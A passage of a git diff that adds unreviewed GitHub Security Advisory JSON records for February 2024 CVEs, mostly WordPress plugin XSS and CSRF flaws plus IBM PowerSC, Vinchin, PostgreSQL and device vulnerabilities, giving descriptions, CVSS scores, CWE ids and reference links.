+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-457g-xg5v-227f/GHSA-457g-xg5v-227f.json b/advisories/unreviewed/2024/02/GHSA-457g-xg5v-227f/GHSA-457g-xg5v-227f.json
new file mode 100644
index 0000000000000..54f330ca944b4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-457g-xg5v-227f/GHSA-457g-xg5v-227f.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-457g-xg5v-227f",
+ "modified": "2024-02-01T12:30:21Z",
+ "published": "2024-02-01T12:30:21Z",
+ "aliases": [
+ "CVE-2023-52188"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Russell Jamieson Footer Putter allows Stored XSS.This issue affects Footer Putter: from n/a through 1.17.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52188"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/footer-putter/wordpress-footer-putter-plugin-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-459m-qjwc-xv42/GHSA-459m-qjwc-xv42.json b/advisories/unreviewed/2024/02/GHSA-459m-qjwc-xv42/GHSA-459m-qjwc-xv42.json
new file mode 100644
index 0000000000000..06172aae2e1ed
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-459m-qjwc-xv42/GHSA-459m-qjwc-xv42.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-459m-qjwc-xv42",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-50327"
+ ],
+ "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses insecure HTTP methods which could allow a remote attacker to perform unauthorized file request modification. IBM X-Force ID: 275109.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50327"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275109"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7113759"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-436",
+ "CWE-650"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T01:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-45qr-r98p-f6qx/GHSA-45qr-r98p-f6qx.json b/advisories/unreviewed/2024/02/GHSA-45qr-r98p-f6qx/GHSA-45qr-r98p-f6qx.json
new file mode 100644
index 0000000000000..09fa78aee0682
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-45qr-r98p-f6qx/GHSA-45qr-r98p-f6qx.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-45qr-r98p-f6qx",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22903"
+ ],
+ "details": "Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the deleteUpdateAPK function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22903"
+ },
+ {
+ "type": "WEB",
+ "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://seclists.org/fulldisclosure/2024/Jan/32"
+ },
+ {
+ "type": "WEB",
+ "url": "http://vinchin.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-45x9-627r-26hh/GHSA-45x9-627r-26hh.json b/advisories/unreviewed/2024/02/GHSA-45x9-627r-26hh/GHSA-45x9-627r-26hh.json
new file mode 100644
index 0000000000000..a81cb5c3e10c4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-45x9-627r-26hh/GHSA-45x9-627r-26hh.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-45x9-627r-26hh",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-7014"
+ ],
+ "details": "The Author Box, Guest Author and Co-Authors for Your Posts – Molongui plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.7.4 via the 'ma_debu' parameter. This makes it possible for unauthenticated attackers to extract sensitive data including post author emails and names if applicable.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7014"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3019084/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/538e9ce3-2d48-44ad-bd08-8eead3ef15c3?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-4683-q5fv-6j3x/GHSA-4683-q5fv-6j3x.json b/advisories/unreviewed/2024/02/GHSA-4683-q5fv-6j3x/GHSA-4683-q5fv-6j3x.json
new file mode 100644
index 0000000000000..98d9f50130a0e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-4683-q5fv-6j3x/GHSA-4683-q5fv-6j3x.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4683-q5fv-6j3x",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33077"
+ ],
+ "details": "Memory corruption in HLOS while converting from authorization token to HIDL vector.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33077"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-46hv-9rq5-9v3w/GHSA-46hv-9rq5-9v3w.json b/advisories/unreviewed/2024/02/GHSA-46hv-9rq5-9v3w/GHSA-46hv-9rq5-9v3w.json
new file mode 100644
index 0000000000000..8057d8167cb4f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-46hv-9rq5-9v3w/GHSA-46hv-9rq5-9v3w.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-46hv-9rq5-9v3w",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0373"
+ ],
+ "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'save_view' function. This makes it possible for unauthenticated attackers to modify arbitrary post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0373"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-47gj-j96m-3hhg/GHSA-47gj-j96m-3hhg.json b/advisories/unreviewed/2024/02/GHSA-47gj-j96m-3hhg/GHSA-47gj-j96m-3hhg.json
new file mode 100644
index 0000000000000..e89d8b32462dd
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-47gj-j96m-3hhg/GHSA-47gj-j96m-3hhg.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-47gj-j96m-3hhg",
+ "modified": "2024-02-02T00:31:26Z",
+ "published": "2024-02-02T00:31:26Z",
+ "aliases": [
+ "CVE-2024-1039"
+ ],
+ "details": "\nGessler GmbH WEB-MASTER has a restoration account that uses weak hard coded credentials and if exploited could allow an attacker control over the web management of the device.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1039"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1391",
+ "CWE-287"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T22:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-47q6-36gc-6phg/GHSA-47q6-36gc-6phg.json b/advisories/unreviewed/2024/02/GHSA-47q6-36gc-6phg/GHSA-47q6-36gc-6phg.json
new file mode 100644
index 0000000000000..1ab6fad3caff1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-47q6-36gc-6phg/GHSA-47q6-36gc-6phg.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-47q6-36gc-6phg",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6985"
+ ],
+ "details": "The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6985"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3027004/ai-assistant-by-10web/trunk/ai-assistant-by-10web.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/229245a5-468d-47b9-8f26-d23d593e91da?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-4828-5p9m-g4ff/GHSA-4828-5p9m-g4ff.json b/advisories/unreviewed/2024/02/GHSA-4828-5p9m-g4ff/GHSA-4828-5p9m-g4ff.json
new file mode 100644
index 0000000000000..3a00fdaddedfe
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-4828-5p9m-g4ff/GHSA-4828-5p9m-g4ff.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4828-5p9m-g4ff",
+ "modified": "2024-02-08T15:30:27Z",
+ "published": "2024-02-08T15:30:27Z",
+ "aliases": [
+ "CVE-2024-0985"
+ ],
+ "details": "Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker's roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker's materialized view. As part of exploiting this vulnerability, the attacker creates functions that use CREATE RULE to convert the internally-built temporary table to a view. Versions before PostgreSQL 15.6, 14.11, 13.14, and 12.18 are affected. The only known exploit does not work in PostgreSQL 16 and later. For defense in depth, PostgreSQL 16.2 adds the protections that older branches are using to fix their vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0985"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.postgresql.org/support/security/CVE-2024-0985/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-271"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T13:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-48gj-6976-qj95/GHSA-48gj-6976-qj95.json b/advisories/unreviewed/2024/02/GHSA-48gj-6976-qj95/GHSA-48gj-6976-qj95.json
new file mode 100644
index 0000000000000..29c367a3c9c52
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-48gj-6976-qj95/GHSA-48gj-6976-qj95.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-48gj-6976-qj95",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2023-45735"
+ ],
+ "details": "\n\n\n\n\nA potential attacker with access to the Westermo Lynx device may be able to execute malicious code that could affect the correct functioning of the device.\n\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45735"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T22:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-48gx-pf5r-9pp3/GHSA-48gx-pf5r-9pp3.json b/advisories/unreviewed/2024/02/GHSA-48gx-pf5r-9pp3/GHSA-48gx-pf5r-9pp3.json
new file mode 100644
index 0000000000000..73006af0b8f15
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-48gx-pf5r-9pp3/GHSA-48gx-pf5r-9pp3.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-48gx-pf5r-9pp3",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2023-6387"
+ ],
+ "details": "A potential buffer overflow exists in the Bluetooth LE HCI CPC sample application in the Gecko SDK which may result in a denial of service or remote code execution",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6387"
+ },
+ {
+ "type": "WEB",
+ "url": "https://community.silabs.com/069Vm000000WNKuIAO"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/SiliconLabs/gecko_sdk/releases/tag/v4.4.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-131"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-4947-vpfm-4vhf/GHSA-4947-vpfm-4vhf.json b/advisories/unreviewed/2024/02/GHSA-4947-vpfm-4vhf/GHSA-4947-vpfm-4vhf.json
new file mode 100644
index 0000000000000..dc8ee831ac962
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-4947-vpfm-4vhf/GHSA-4947-vpfm-4vhf.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4947-vpfm-4vhf",
+ "modified": "2024-02-06T21:30:26Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-24470"
+ ],
+ "details": "Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the update_post.php component.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24470"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tang-0717/cms/blob/main/1.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-496r-wr54-46h8/GHSA-496r-wr54-46h8.json b/advisories/unreviewed/2024/02/GHSA-496r-wr54-46h8/GHSA-496r-wr54-46h8.json
new file mode 100644
index 0000000000000..e3590bed79497
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-496r-wr54-46h8/GHSA-496r-wr54-46h8.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-496r-wr54-46h8",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-50937"
+ ],
+ "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 275117.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50937"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275117"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7113759"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-327"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-4974-qrr5-pm93/GHSA-4974-qrr5-pm93.json b/advisories/unreviewed/2024/02/GHSA-4974-qrr5-pm93/GHSA-4974-qrr5-pm93.json
new file mode 100644
index 0000000000000..0245baf37143e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-4974-qrr5-pm93/GHSA-4974-qrr5-pm93.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4974-qrr5-pm93",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0761"
+ ],
+ "details": "The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers, to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0761"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wordpress.org/plugins/wp-file-manager/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-498h-4fxq-xcr3/GHSA-498h-4fxq-xcr3.json b/advisories/unreviewed/2024/02/GHSA-498h-4fxq-xcr3/GHSA-498h-4fxq-xcr3.json
new file mode 100644
index 0000000000000..75e261d1adbe6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-498h-4fxq-xcr3/GHSA-498h-4fxq-xcr3.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-498h-4fxq-xcr3",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2024-0254"
+ ],
+ "details": "The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0254"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-4f24-3c6c-gh99/GHSA-4f24-3c6c-gh99.json b/advisories/unreviewed/2024/02/GHSA-4f24-3c6c-gh99/GHSA-4f24-3c6c-gh99.json
new file mode 100644
index 0000000000000..a199f894fbac2
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-4f24-3c6c-gh99/GHSA-4f24-3c6c-gh99.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4f24-3c6c-gh99",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0612"
+ ],
+ "details": "The Content Views – Post Grid, Slider, Accordion (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0612"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3024861/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-4f6r-f3wr-x5fw/GHSA-4f6r-f3wr-x5fw.json b/advisories/unreviewed/2024/02/GHSA-4f6r-f3wr-x5fw/GHSA-4f6r-f3wr-x5fw.json
new file mode 100644
index 0000000000000..c5b62985bd17f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-4f6r-f3wr-x5fw/GHSA-4f6r-f3wr-x5fw.json
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4f6r-f3wr-x5fw", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0659" + ], + "details": "The Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the variable pricing option title in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manger-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0659" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git 